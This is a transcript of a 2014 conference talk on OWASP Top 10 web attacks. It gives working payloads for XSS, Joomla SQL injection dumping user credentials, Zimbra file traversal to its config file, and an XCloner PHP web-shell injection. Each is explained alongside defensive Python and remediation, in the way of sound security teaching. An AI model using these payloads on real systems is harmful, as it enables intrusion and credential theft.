The Web You Thought You Knew
DESCRIPTION
This is a presentation given at the Africahackon 2014 conference on web security, with particular focus on the OWASP Top 10.
TRANSCRIPT
![Page 1: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/1.jpg)
The Web you thought you knew
By Munir Njiru and Ruth Macharia
![Page 2: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/2.jpg)
Web Security Please?
● Most people don't think it's relevant. Why?
– You either can't comprehend someone attacking you.
– You have no idea about attacks.
![Page 3: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/3.jpg)
OWASP Top 10
● Glad I got your attention.
● There are people who have tried to open your eyes by creating awareness of this: OWASP (the Open Web Application Security Project).
● They have ten categories for these attacks, but I will not bore you with all that talk, so get more info here: https://www.owasp.org/index.php/Top_10_2013-Top_10
![Page 4: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/4.jpg)
Don't be deluded!!
The web can't be covered in a day. Bear with this: it's the tip of the iceberg, but relevant. If we could cover it all, you'd feel this:
![Page 5: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/5.jpg)
So what's the worst?
Why should I care, what could these breaches possibly do, you ask?
Well:
– You could lose your webutation.
– You could lose cash.
– You could have your secrets exposed.
– And for admins, you could involuntarily sign a power-sharing agreement, and we know you don't like that.
This list is not comprehensive; if you are holding your breath, keep holding it :)
![Page 6: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/6.jpg)
Disclaimer
You will see jumbled stuff on screen when an attack is carried out, but don't panic at all the technical jargon; just look at the results that come out of the jargon, and the answer to what was happening will come.
![Page 7: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/7.jpg)
I made a mistake? How?
Let us tell this as a story; you will see how people slowly slip into the OWASP Top 10, maybe not everywhere, but in enough places to render you done for:
![Page 8: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/8.jpg)
I made a mistake? How?
So the IT manager had a proposal: a dynamic site built on the technology of today and a robust mail server for communication. Here are his specifications:
– Dynamic content management on a robust platform (Joomla)
– Backup system based on XCloner
– Forum based on Kunena, to enable interaction between staff and clients
– Zimbra server for mail handling
![Page 9: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/9.jpg)
I made a mistake? How?
He missed, however, checking the security of the proposed system, and the version information led to this site's demise.
Let me save you the headache of his version information. Recon was mentioned earlier; well, it got us this:
- Joomla 1.5.15
- XCloner 2.1
- Kunena 1.6.1
- Zimbra 8.0.2
![Page 10: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/10.jpg)
XSS
Well, this is the ability of an attacker to diss you using your browser.
It's basically the ability to add code (script) to the page you see, and this code is not usually added in your best interest. Because the injected script runs inside the site's own page, it can do whatever that page can do in your browser, including reading cookies that are not marked HttpOnly.
![Page 11: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/11.jpg)
Your Browser Dissed You!
Payload => <script>alert("I said it was just an XSS what's the worst that could happen? \n Then the hackers at Africahackon went straight for my cookie jar and found all my secrets: \n\n" );</script>
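The slide shows the payload but not why it works, so here is an added example (not code from the talk or from the site it describes) in Python, because the mechanics are the same in any server language: a naive template concatenates untrusted input into HTML, and the fix is to entity-encode every untrusted value for the context it lands in. It goes slightly beyond the slide by also showing an attribute-context payload that needs no angle brackets at all. The forum-post template, the author/comment field names and the shortened payload strings are constructed for the demonstration.

```python
import html

# Shortened copy of the slide's payload (constructed for this example).
XSS_PAYLOAD = ('<script>alert("I said it was just an XSS what\'s the worst '
               'that could happen?");</script>')
# Attribute-context variant (constructed): no angle brackets, it simply
# closes the value="" attribute and adds an event handler.
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_comment_vulnerable(author, comment):
    """Builds a forum post the way a naive template does: untrusted strings
    are concatenated straight into the HTML, so whatever the attacker typed
    is parsed as markup by every visitor's browser."""
    return (f'<div class="post">'
            f'<input name="author" value="{author}">'
            f'<p>{comment}</p></div>')


def render_comment_safe(author, comment):
    """Same page, but each untrusted value is HTML-entity encoded.
    quote=True also encodes " and ', which is what keeps a value from
    breaking out of an attribute."""
    return (f'<div class="post">'
            f'<input name="author" value="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(comment, quote=True)}</p></div>')


def contains_executable_markup(page):
    """Crude but sufficient check for this demonstration: a payload has
    escaped its text or attribute context if a raw <script> tag or a live
    event-handler attribute survives in the rendered output."""
    lowered = page.lower()
    return "<script" in lowered or ' onfocus="' in lowered
```

Encoding on output is the fix for the injection itself; marking the session cookie HttpOnly is the separate control that keeps a script which does get in from reading document.cookie, which is the "cookie jar" the next slide jokes about.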
![Page 12: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/12.jpg)
Your Browser Dissed You!
Demo
![Page 13: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/13.jpg)
SQL Injection
First of all, you don't need to go through a medicine class to get this.
In layman's terms, it is the ability to sweet-talk your database so that it gives everything up!!! Technically, user input is pasted straight into the text of a SQL query, so an attacker can end the statement the developer intended and append their own.
![Page 14: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/14.jpg)
I just saw my Name!!!!
Payload => %' and 1=2) union select 1, concat(0x3a,username,0x3a,email,0x3a,0x3a,activation),concat(0x3a,username,0x3a,email,0x3a,password,0x3a,activation),'Super Administrator','email','2009-11-26 22:09:28','2009-11-26 22:09:28',62,1,1,0,0,0,1,15 from jos_users-- ;
How it reads: %' closes the LIKE string the site was building, and 1=2 empties the original result set, ) closes the open parenthesis, and the UNION SELECT appends rows of the attacker's choosing with exactly as many columns (15) as the original query, so the database accepts it. The 0x3a literals are colons used as separators, jos_users is Joomla's default users table, and -- comments out whatever the application appends after the injection point.
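To make the payload's shape concrete, this added example (not code from the talk, and not the site's real query) runs the same kind of injection against an in-memory SQLite database from Python, then shows the bound-parameter version that defeats it. The query shape (a LIKE inside parentheses) is assumed from the payload's leading %' and closing ); the table contents are constructed, and the payload is rewritten in SQLite syntax (|| instead of MySQL's concat(), a ':' literal instead of 0x3a, two columns instead of fifteen to match this query).

```python
import sqlite3


def make_db():
    """Constructed sample database: a Joomla-style jos_users table and the
    content table that the site's search feature queries."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE jos_users (id INTEGER, username TEXT, email TEXT, password TEXT);
        INSERT INTO jos_users VALUES
            (62, 'admin', 'admin@example.test', 'b3d6e8f1c0a2:saltvalue');
        CREATE TABLE jos_content (id INTEGER, title TEXT, state INTEGER);
        INSERT INTO jos_content VALUES (1, 'Welcome to the site', 1);
        INSERT INTO jos_content VALUES (2, 'Unpublished draft', 0);
    """)
    return con


def search_vulnerable(con, term):
    """The search term is spliced straight into the SQL text. This query
    shape is assumed; it is what the slide's payload is built for: %'
    closes the LIKE string and ) closes the parenthesis."""
    sql = ("SELECT id, title FROM jos_content "
           f"WHERE (title LIKE '%{term}%' AND state = 1)")
    return con.execute(sql).fetchall()


def search_safe(con, term):
    """Same query with a bound parameter. The driver passes the term as
    data, so quotes, parentheses and comment markers inside it are never
    parsed as SQL, whatever the user typed."""
    sql = ("SELECT id, title FROM jos_content "
           "WHERE (title LIKE ? AND state = 1)")
    return con.execute(sql, (f"%{term}%",)).fetchall()


# SQLite rendering of the slide's payload: same structure, two columns
# to match the search query above, and -- to discard the trailing SQL.
PAYLOAD = ("%' and 1=2) union select id, "
           "username || ':' || email || ':' || password from jos_users--")
```

The column count is the part attackers have to get right by trial and error; that is why the slide's payload is padded with constants such as 62, 1, 1, 0 after the two concat() calls.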
![Page 15: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/15.jpg)
I just saw my Name!!!!
Demo
![Page 16: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/16.jpg)
Information Disclosure
It's technically giving information away to anyone who asks for it...
Payload => task=info
![Page 17: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/17.jpg)
Information Disclosure
Demo
![Page 18: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/18.jpg)
LFI
LFI (Local File Inclusion) is basically the ability to read files within the system, usually because a file path is built from a request parameter and never checked against the directory it was meant to stay in.
If you are thinking "big deal, so what?", just chill; you will be answered.
![Page 19: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/19.jpg)
Waiiittt the mail tooo???
![Page 20: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/20.jpg)
Waiiittt the mail tooo???
![Page 21: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/21.jpg)
Waiiittt the mail tooo???
Payload => res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
How it reads: the skin parameter is used to build a file path, the ../ sequences walk out of the skins directory up to the filesystem root, and the trailing %00 (a NUL byte) cuts off whatever the server would otherwise append to the path. The file that comes back, /opt/zimbra/conf/localconfig.xml, is Zimbra's local configuration file, credentials included.
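The two tricks in that payload, directory traversal and NUL-byte truncation, are easy to reproduce and to defend against, so here is an added example (not code from the talk, and not Zimbra's code or directory layout) in Python. It emulates a lookup that appends a fixed file name to a user-supplied skin name and stops at the first NUL byte, as C and older Java file APIs did, and then a hardened lookup that rejects the byte, allowlists the name and checks the normalised path. SKIN_DIR and the skin.properties suffix are hypothetical.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical server layout (assumed, not Zimbra's real tree): skins live
# under SKIN_DIR and the server reads <SKIN_DIR>/<skin>/skin.properties.
SKIN_DIR = "/srv/webmail/skins"

# The skin value from the slide's payload, still URL-encoded as it travels
# in the query string; %00 at the end is a NUL byte.
PAYLOAD = "../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"


def resolve_vulnerable(skin_param):
    """Emulates the flawed lookup: the decoded parameter is concatenated
    into a path, and the file API treats the first NUL byte as the end of
    the string, so the suffix the server appended is silently dropped."""
    skin = unquote(skin_param)
    path = f"{SKIN_DIR}/{skin}/skin.properties"
    path = path.split("\x00", 1)[0]      # NUL truncation, C-string style
    return posixpath.normpath(path)      # ../ segments are honoured


def resolve_safe(skin_param):
    """Hardened lookup: reject NUL outright, accept only a strict skin-name
    alphabet, and still verify the normalised path stays under SKIN_DIR
    (defence in depth; in production use os.path.realpath so symlinks
    are resolved before the check)."""
    skin = unquote(skin_param)
    if "\x00" in skin:
        raise ValueError("NUL byte in skin name")
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", skin):
        raise ValueError("skin name outside the allowed alphabet")
    path = posixpath.normpath(f"{SKIN_DIR}/{skin}/skin.properties")
    if not path.startswith(SKIN_DIR + "/"):
        raise ValueError("path escapes the skins directory")
    return path


def is_rejected(skin_param):
    """True when the hardened lookup refuses the parameter."""
    try:
        resolve_safe(skin_param)
    except ValueError:
        return True
    return False
```

Recent Python versions raise ValueError on an embedded NUL in open() themselves, but the allowlist is what matters: an encoded ..%2F or a name such as ../../etc is rejected before any path is built.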
![Page 22: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/22.jpg)
Waiiittt the mail tooo???
Demo
![Page 23: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/23.jpg)
See it in Action!!!!
To see this done manually, without the script, check our video to get the gist of the background:
http://www.youtube.com/watch?v=ahJLYT8CLow
![Page 24: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/24.jpg)
RCE
Just when you thought we were done :D Well, you were warned; the web is wide, but we will be winding up in a bit.
RCE: it's not "Regional Centres of Expertise", it's Remote Code Execution, meaning the attacker gets the server itself to run code of their choosing.
![Page 25: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/25.jpg)
What Just Happened???
Payload => ?task=step2&output_url_pref=';+}+?>+<?php+eval($_GET['africahackon']);+?>&output_path=../../../../
How it reads: the output_url_pref value is saved into a generated PHP file between two quote characters, without escaping (the + characters are URL-encoded spaces). The leading ' closes that string literal, } closes the enclosing block, ?> leaves PHP mode, and <?php eval($_GET['africahackon']); ?> re-enters it, so from then on any request that carries an africahackon parameter gets its contents executed as PHP on the server. The output_path value is a directory traversal sent in the same request.
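Writing settings into executable code is the root cause here, so this added example (not code from the talk, and not XCloner's actual template, whose block structure is only inferred from the } in the payload) shows in Python what the generated PHP file looks like with raw interpolation beside the escaped version, plus a small scanner that counts how many <?php tags end up in code context rather than inside a string literal. The CONFIG_LOADED guard and the $_CONFIG array name are hypothetical.

```python
from urllib.parse import unquote_plus

# The output_url_pref value from the slide, decoded the way PHP decodes a
# query string (+ becomes a space).
INJECTED_VALUE = unquote_plus("';+}+?>+<?php+eval($_GET['africahackon']);+?>")

# Constructed settings as the handler would receive them.
SETTINGS = {"output_url_pref": INJECTED_VALUE, "output_path": "../../../../"}


def php_single_quote(value):
    # A PHP single-quoted literal has exactly two escapes: \\ and \'.
    # Everything else, <?php and ?> included, is inert inside the literal.
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def php_single_unquote(literal):
    # Inverse of php_single_quote, used to show the escaping round-trips.
    assert literal[0] == literal[-1] == "'"
    body, out, i = literal[1:-1], [], 0
    while i < len(body):
        if body[i] == "\\" and i + 1 < len(body) and body[i + 1] in "\\'":
            out.append(body[i + 1])
            i += 2
        else:
            out.append(body[i])
            i += 1
    return "".join(out)


def render_config(settings, quote):
    # Hypothetical config-file template: assignments inside a guard block.
    lines = ["<?php", "if (!defined('CONFIG_LOADED')) {"]
    for key, value in settings.items():
        lines.append(f"    $_CONFIG['{key}'] = {quote(value)};")
    lines += ["}", "?>"]
    return "\n".join(lines)


def render_config_vulnerable(settings):
    # Raw interpolation between two quote characters, no escaping at all.
    return render_config(settings, lambda v: f"'{v}'")


def render_config_safe(settings):
    return render_config(settings, php_single_quote)


def php_open_tags_in_code(text):
    """Count '<?php' tokens that sit in code context, i.e. outside a
    single-quoted string literal. A minimal scanner that understands only
    the single-quote escapes, which is all the generated file uses."""
    count, in_string, i = 0, False, 0
    while i < len(text):
        ch = text[i]
        if in_string:
            if ch == "\\":            # skip the escaped character
                i += 2
                continue
            if ch == "'":
                in_string = False
        elif ch == "'":
            in_string = True
        elif text.startswith("<?php", i):
            count += 1
            i += 5
            continue
        i += 1
    return count
```

Escaping makes the file parse as intended, but the sturdier remedy is not to store settings as PHP source at all: a JSON or INI file that is read, never included, cannot be turned into code by any value.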
![Page 26: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/26.jpg)
What Just Happened???
Demo
![Page 27: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/27.jpg)
Remediation
● This would all have been avoided if:
– Data was validated on the platform: output encoded for the page, queries parameterised, and file paths and configuration values never built from raw request input.
– The technology was investigated before being implemented, and kept up to date afterwards.
![Page 28: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/28.jpg)
Questions
● Don't be ashamed to scratch your head after this; I would too, it's a lot of information.
![Page 29: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/29.jpg)
Contact Us
![Page 30: The Web You Thought You Knew](https://reader033.vdocuments.net/reader033/viewer/2022042601/555e5bc7d8b42ad74a8b552a/html5/thumbnails/30.jpg)
THANK YOU